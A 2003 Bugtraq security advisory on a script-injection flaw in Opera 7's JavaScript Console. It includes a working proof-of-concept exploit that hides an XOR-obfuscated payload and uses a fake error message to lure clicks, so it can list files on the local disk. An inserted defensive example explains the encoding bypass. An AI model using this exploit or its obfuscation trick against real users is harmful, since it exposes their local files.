Bugtraq mailing list archives

[Opera 7] Yet Another Story of "Phantom of the Opera"


From: nesumin <nesumin () softhome net>
Date: Mon, 28 Apr 2003 03:09:00 +0900

Greetings.
We, :: Operash ::, hereby release information about a vulnerability in Opera.

           _________________________________________________

---------------------------------------------------------------------------------
SYNOPSIS       : [Opera 7] Script Injection Vulnerability in JavaScript Console
                 - Yet another story of "Phantom of the Opera".
PRODUCT        : Opera for Windows
VERSIONS       : 7.10 build 2840
                 7.03 build 2670
                 7.02 build 2668
                 7.02 bork build 2656b
                 7.01 build 2651
VENDOR         : Opera Software ASA (http://www.opera.com/)
SEVERITY       : Medium.
                 Access to local disk.
DISCOVERED BY  : :: Operash :: (nesumin)
REPORTED DATE  : 2003-04-25
PUBLISHED DATE : 2003-04-28
---------------------------------------------------------------------------------

0. PRODUCT INFORMATION
========================

  Opera for Windows is a GUI-based Web browser.
  Opera Software ASA (http://www.opera.com/)


1. DESCRIPTION
================

  The "JavaScript Console" of Opera 7, which displays JavaScript error messages,
  has a vulnerability that allows arbitrary script to be injected into a link.

  This vulnerability can cause execution of arbitrary script in the Local Security Zone (file://)
  when a user opens a link that contains arbitrary script, generated from
  a manipulated error message shown on the JavaScript Console.

  This is a security hole that makes it possible to leak data from the user's local disk
  to the outside.


2. SYSTEMS AFFECTED
=====================

  Opera 7.10 build 2840
  Opera 7.03 build 2670
  Opera 7.02 build 2668
  Opera 7.02 bork build 2656b
  Opera 7.01 build 2651


3. SYSTEMS NOT AFFECTED
=======================

  ----


4. EXAMINED
=============

  Opera for Windows (English/Japanese) :
    Opera 7.10 build 2840
    Opera 7.03 build 2670
    Opera 7.02 build 2668
    Opera 7.02 bork build 2656b
    Opera 7.01 build 2651

  Platform :
    Windows 98SE Japanese
    Windows 2000 PRO SP3 Japanese


5. TO VENDOR
==============

  Reported (2003/04/25).


6. SOLUTION
==============

  Disable JavaScript.


7. DETAILS
=============

  This vulnerability is caused by the script in Opera 7's console.html,
  which does not sufficiently sanitize single quotes.
  This allows arbitrary script to be injected into the link on the JavaScript Console.
  Arbitrary script can be embedded in the link by posting an error message
  that contains a single quote, as shown below.


    var message = "http://&apos;);alert(location.href+'";
    opera.postError( message );
    location.href = "file://localhost/console.html";

    OUTPUT:

    <a href="javascript:opera.openInSourceViewer('http://&apos;);alert(location.href+'')">***</a>


  Although Opera 7.10 contains a fix that deletes "'" and "&apos;",
  it is not enough to prevent this vulnerability.
  For instance, if "&#39;" is used instead of "'" as shown below,
  it is interpreted as "'" in the link and arbitrary script can still be injected.


    var message = "http://&#39;);alert(location.href+&#39;";
    opera.postError( message );
    location.href = "file://localhost/console.html";
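To make the failure mode above concrete, here is an added example (not the advisory's or Opera's code) that models the two decoding stages the console link passes through, HTML attribute entity decoding and then JavaScript string-literal parsing, and contrasts a quote-stripping filter like the one described for 7.10 with context-aware encoding. The function names and the simplified decoder are this example's own assumptions.

```javascript
// Added example (not the advisory's or Opera's code): models the two decoding
// stages the console link passes through, HTML attribute entity decoding and
// then JavaScript string-literal parsing, and contrasts a quote-stripping
// filter with context-aware encoding. Function names are this example's own.

// Stage 1: entity decoding an HTML parser applies to an attribute value
// (subset: numeric references plus the five named ones that matter here).
function decodeAttributeValue(s) {
  return s.replace(/&(#x[0-9a-f]+|#\d+|apos|quot|amp|lt|gt);/gi, (_, e) => {
    if (e[0] === "#") {
      const cp = /^#x/i.test(e) ? parseInt(e.slice(2), 16) : parseInt(e.slice(1), 10);
      return String.fromCodePoint(cp);
    }
    return { apos: "'", quot: '"', amp: "&", lt: "<", gt: ">" }[e.toLowerCase()];
  });
}

// The kind of filter the advisory describes for 7.10: delete "'" and "&apos;"
// and nothing else, so "&#39;" passes through and becomes "'" in stage 1.
function stripQuoteFilter(message) {
  return message.replace(/'|&apos;/g, "");
}

// Context-aware alternative: every character outside [A-Za-z0-9] becomes a
// \uXXXX escape. The output holds no quote, "&", "<", "%" or stray backslash,
// so it survives attribute decoding (and any percent-decoding of the
// javascript: URL) unchanged and can only be read as string data.
function jsStringEscape(message) {
  return message.replace(/[^A-Za-z0-9]/g, c =>
    "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}

// The href shape shown in the advisory's OUTPUT line, with a pluggable encoder.
function buildHref(message, encode) {
  return "javascript:opera.openInSourceViewer('" + encode(message) + "')";
}

// Stage 2 check: after attribute decoding, the call must consist of exactly one
// well-formed single-quoted literal. Any extra quote means the literal was
// closed early and the rest of the message would be parsed as code.
function literalIsIntact(href) {
  const call = decodeAttributeValue(href).slice("javascript:opera.openInSourceViewer(".length);
  return /^'(?:[^'\\]|\\u[0-9a-fA-F]{4})*'\)$/.test(call);
}

// Probe taken from the advisory's second variant (constructed test input).
const PROBE = "http://&#39;);alert(location.href+&#39;";
```

The stage model is a simplification of what a real browser does; the point it demonstrates is that a blacklist applied before entity decoding cannot be complete, whereas output encoding chosen for the innermost context needs no list of bad characters at all.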


  Through this vulnerability, if the user opens the link on the JavaScript Console,
  a script that can obtain directory listings and read file contents
  from the user's local disk is executed in the context of "file://localhost/console.html".


  This vulnerability is related to the vulnerability published
  by GreyMagic Software on 2003-01-29.

    GreyMagic Software - Phantom of the Opera (GM#003-OP)
    http://security.greymagic.com/adv/gm003-op/

  Whereas GM#003-OP was an issue with double quotes,
  this vulnerability is an issue with single quotes in the same part of the script.
  Naturally, the vendor should also have checked the single-quote case
  when GreyMagic Software reported the double-quote issue to them,
  but they neglected it and left it as is.
  We assume that a deficiency of diligence has brought this issue in its train.


8. SAMPLE CODE
================

  This code generates a link on the JavaScript Console
  that reads the directory listing of local disk "c:\" and displays it.

  [1] Replace "Xploit" with "script" and save as an HTML file
  [2] Upload it to a Web server
  [3] Open it with Opera (JavaScript enabled)
  [4] Click the link on the JavaScript Console

    ----------------------------------------------------------------
    <Xploit>
    var depth = 1;
    var startdir = "file://localhost/c:/";

    // arbitrary script
    var evil_script="";
    evil_script += "function dt(dp){\n";
    evil_script += "var i,j,tr,td,b;\n";
    evil_script += "if('complete'==fr.document.readyState&&";
    evil_script += "fr.document.getElementsByTagName('base').item(0)){\n";
    evil_script += "tr=fr.document.getElementsByTagName('tr');\nb='<hr>\\n'";
    evil_script += "+fr.document.getElementsByTagName('base').item(0).href;\n";
    evil_script += "b+='<br>\\n'+'Count : '+tr.length+'<br>\\n';\n";
    evil_script += "for(i=1;i<tr.length;++i){\n";
    evil_script += "td = tr.item(i).getElementsByTagName('td');\n";
    evil_script += "if (td.item(0).innerText.match(/^\\.\\.?$/))continue;\n";
    evil_script += "if(dp>0 && td.item(0).getElementsByTagName('img')";
    evil_script += ".item(0).src.match(/\\\\folder\\.gif$/))\n";
    evil_script += "ds.push(td.item(0).getElementsByTagName('a').item(0).href);\n";
    evil_script += "for (j=0;j<4;++j)b+=td.item(j).innerText+' ';";
    evil_script += "b+='<br>\\n';}tree.innerHTML+=b;\n";
    evil_script += "if (0>=ds.length)return;fr.location.href=ds.pop();--dp;}\n";
    evil_script += "setTimeout('dt('+dp+');',30);}\nvar ds = new Array(),";
    evil_script += "b = document.getElementsByTagName('body').item(0),";
    evil_script += "f = document.createElement('iframe'),";
    evil_script += "d = document.createElement('div');\n";
    evil_script += "d.setAttribute('id','tree');b.appendChild(d);\n";
    evil_script += "f.style.width=f.style.height=f.style.border=0;\n";
    evil_script += "f.setAttribute('src','"+startdir+"');\n";
    evil_script += "f.setAttribute('id','fr');\n";
    evil_script += "b.appendChild(f);\n";
    evil_script += "dt("+depth+");\n";

    // xor and URLEncode
    evil_script = escape(evil_script.replace(/./g,function(s){
        return(String.fromCharCode(0x80^s.charCodeAt(0)))}));

    var msg = "http://";

    // fake url
    msg += "foo.hogebar.foo/bug?summary=fatal%20error&type=unknown&content=%90%12%38%79%80m";

    // code
    msg += "&#39;);m=&#39;";
    msg += evil_script;
    msg += "&#39;;eval(unescape(m).replace(/./g,function(s){";
    msg += "return(String.fromCharCode(0x80^s.charCodeAt(0)))})+&#39;\n";

    // fake message
    msg += "\n";
    msg += "Fatal Error !!!!\n\n";
    msg += "  Please click above link.\n"; // :p

    opera.postError(msg);
    //window.open("file://localhost/console.html","","");
    location.href = "file://localhost/console.html";

    </Xploit>
    ----------------------------------------------------------------


9. DISCLAIMER
===============

  a. We cannot guarantee the accuracy of all statements in this information.
  b. We do not anticipate issuing updated versions of this information
     unless there is some material change in the facts.
  c. We take no responsibility for any kind of disadvantage arising from
     the use of this information.
  d. Copyright is held by :: Operash :: and relatives.


10. CONTACT, ETC
=================

  :: Operash ::
  [ Unofficial Opera bug and security information site for Japanese users ]

  imagine (Operash Webmaster)
  nesumin <nesumin () softhome net>


  Thanks to :

    melorin
    piso(sexy)


         _________________________________________________


-------
nesumin <nesumin () softhome net>
